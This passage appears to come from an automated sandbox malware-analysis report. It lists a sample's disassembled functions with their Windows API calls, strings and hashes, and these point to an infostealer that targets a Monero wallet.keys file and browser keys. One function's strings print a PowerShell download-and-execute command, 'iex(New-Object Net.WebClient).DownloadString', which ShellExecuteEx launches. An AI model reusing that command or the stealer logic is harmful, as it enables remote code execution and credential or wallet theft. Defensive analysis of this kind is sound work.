                                  • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00E53AEE,?), ref: 00E592FC
                                  • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00E59319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00E59327
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: :$:
                                  • API String ID: 1378416451-4250114551
                                  • Opcode ID: d9270341abb9bb6e39df6493bf633a91363255049927f80938574662466351df
                                  • Instruction ID: 081e32b486bea305d95b4a3fd07d054160fa4ed5ee90774e4fe4af3292c57a72
                                  • Opcode Fuzzy Hash: d9270341abb9bb6e39df6493bf633a91363255049927f80938574662466351df
                                  • Instruction Fuzzy Hash: EDF08C34F04208FBDB20DBB0DC08B9E77B9EB48711F108654BA92A72C4D67596009B40
                                  Function 00E540B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00E540D5
                                  • RegOpenKeyExA.ADVAPI32(80000001,01CBDFB8,00000000,00020119,?), ref: 00E540F4
                                  • RegQueryValueExA.ADVAPI32(?,01CBEC18,00000000,00000000,00000000,000000FF), ref: 00E54118
                                  • RegCloseKey.ADVAPI32(?), ref: 00E54122
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E54147
                                  • lstrcat.KERNEL32(?,01CBEC30), ref: 00E5415B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID:
                                  • API String ID: 2623679115-0
                                  • Opcode ID: 18f2d5f69eb70d948be32dc375939af3836cdcb5ce0eee7804b87aa2f28d53fa
                                  • Instruction ID: e767e1c7c299d8cdeffa21b432ffc9ea5407df539c33d9632cc529c5fbab5354
                                  • Opcode Fuzzy Hash: 18f2d5f69eb70d948be32dc375939af3836cdcb5ce0eee7804b87aa2f28d53fa
                                  • Instruction Fuzzy Hash: 70418AB6D10108ABDF24EBA0EC46FEE737DA788300F004959B65567185EE795B8C8BA1
                                  Function 00E499C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E499EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E49A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00E49A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E49A5A
                                  • LocalFree.KERNEL32(00E4148F), ref: 00E49A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00E49A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 787fa877a27f9a1e13948dbedb1823ba3d72063c33a1ba4b2b9f1571c3ea087c
                                  • Instruction ID: 587a0c017a3519efd531effdf54ea97380ae757d1004dc626c39a9a942b10512
                                  • Opcode Fuzzy Hash: 787fa877a27f9a1e13948dbedb1823ba3d72063c33a1ba4b2b9f1571c3ea087c
                                  • Instruction Fuzzy Hash: E6313AB4A00209EFDB24CF94D885BAE77F5FF48304F108158E902B7284D779AA41DFA0
                                  Function 00E5C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Typememset
                                  • String ID:
                                  • API String ID: 3530896902-3916222277
                                  • Opcode ID: 39c0f6df5db16d2686aaaa9bedc2868954f11611711603ed61c94eec0a9e35ed
                                  • Instruction ID: 1777d943a968b920fc8cd1855116d817567842f6d6d275fe84520deacbfabeac
                                  • Opcode Fuzzy Hash: 39c0f6df5db16d2686aaaa9bedc2868954f11611711603ed61c94eec0a9e35ed
                                  • Instruction Fuzzy Hash: D641E77110079C5EDB258B248C94FFB7BF89B45709F2458A8ED8AA6182D2719A49CF60
                                  Function 00E54780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,01CBED50), ref: 00E547DB
                                    • Part of subcall function 00E58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E54801
                                  • lstrcat.KERNEL32(?,?), ref: 00E54820
                                  • lstrcat.KERNEL32(?,?), ref: 00E54834
                                  • lstrcat.KERNEL32(?,01CABF58), ref: 00E54847
                                  • lstrcat.KERNEL32(?,?), ref: 00E5485B
                                  • lstrcat.KERNEL32(?,01CBE118), ref: 00E5486F
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E58D90: GetFileAttributesA.KERNEL32(00000000,?,00E41B54,?,?,00E6564C,?,?,00E60E1F), ref: 00E58D9F
                                    • Part of subcall function 00E54570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E54580
                                    • Part of subcall function 00E54570: RtlAllocateHeap.NTDLL(00000000), ref: 00E54587
                                    • Part of subcall function 00E54570: wsprintfA.USER32 ref: 00E545A6
                                    • Part of subcall function 00E54570: FindFirstFileA.KERNEL32(?,?), ref: 00E545BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 052484104d5db2e42d6b8e1de42925ba7ac4f4ca7e824006054723c92019cfd5
                                  • Instruction ID: 2393eef2299cc966180b6a6a4f3e60abe90786dd1206e291d5fcb3544937ab36
                                  • Opcode Fuzzy Hash: 052484104d5db2e42d6b8e1de42925ba7ac4f4ca7e824006054723c92019cfd5
                                  • Instruction Fuzzy Hash: 463176B290021897CB24F770DC85EED73BCAB48701F405999B79976085EE78978DCB91
                                  Function 00E52C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E52D85
                                  Strings
                                  • <, xrefs: 00E52D39
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00E52D04
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00E52CC4
                                  • ')", xrefs: 00E52CB3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 13fc75129d150d3ec5067297434e18250ebf3209bb07c151037c21f0bd20a6f0
                                  • Instruction ID: 5e12ac3359714836fa97eec89972114cd1b39513c485ce6d8f1a4b073874fb89
                                  • Opcode Fuzzy Hash: 13fc75129d150d3ec5067297434e18250ebf3209bb07c151037c21f0bd20a6f0
                                  • Instruction Fuzzy Hash: 2C410071C102189ADB18FFA0D896BDDB7B4BF10301F445629E906B7192EF742A4ECF91
                                  Function 00E49E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00E49F41
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 4171519190-1096346117
                                  • Opcode ID: e5cbfdc7dab364f52eecd0c3d6a1191943a3eb6893f8b3352ebb84741b32df75
                                  • Instruction ID: 2e854db539e3fdc1447c66c0919e20e39cc8f21c61e5ddfdd803a0048ef8069a
                                  • Opcode Fuzzy Hash: e5cbfdc7dab364f52eecd0c3d6a1191943a3eb6893f8b3352ebb84741b32df75
                                  • Instruction Fuzzy Hash: D2616131A50208DBDB24EFA4DC96FEE77B5AF44340F049528F90A7F181EB746A09CB52
                                  Function 00E570D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • memset.MSVCRT ref: 00E5716A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpymemset
                                  • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 4047604823-3520659465
                                  • Opcode ID: 5773684b0e1a2eb633d165ce2992dc68ff5fd79bc4a6938f36717fe22b9e71e5
                                  • Instruction ID: c6d094fff9e2c5e1a15e8d993749b2405ea48627d292a9329329e96c7115b0aa
                                  • Opcode Fuzzy Hash: 5773684b0e1a2eb633d165ce2992dc68ff5fd79bc4a6938f36717fe22b9e71e5
                                  • Instruction Fuzzy Hash: 6251A4B0C042189FDB14EB90ED85BEEB3B4AF44305F5469A8E94577181EB746E8CCF54
                                  Function 00E56920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00E5696C
                                  • sscanf.NTDLL ref: 00E56999
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E569B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E569C0
                                  • ExitProcess.KERNEL32 ref: 00E569DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 8582761e0937aae7fda50daff75457ef48b22ba0b1c4ead2d7ee6cb88bbfced9
                                  • Instruction ID: 73bbd19f5083e7b2b16558c770bc7554539cce08aed65ce2a4e000ef3044188f
                                  • Opcode Fuzzy Hash: 8582761e0937aae7fda50daff75457ef48b22ba0b1c4ead2d7ee6cb88bbfced9
                                  • Instruction Fuzzy Hash: 2321EA75D14208EBCF08EFE4D945AEEB7B5BF48301F04852AE446B3244EB355609CB65
                                  Function 00E57E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57E37
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E57E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,01CAC9C0,00000000,00020119,?), ref: 00E57E5E
                                  • RegQueryValueExA.ADVAPI32(?,01CBE038,00000000,00000000,000000FF,000000FF), ref: 00E57E7F
                                  • RegCloseKey.ADVAPI32(?), ref: 00E57E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
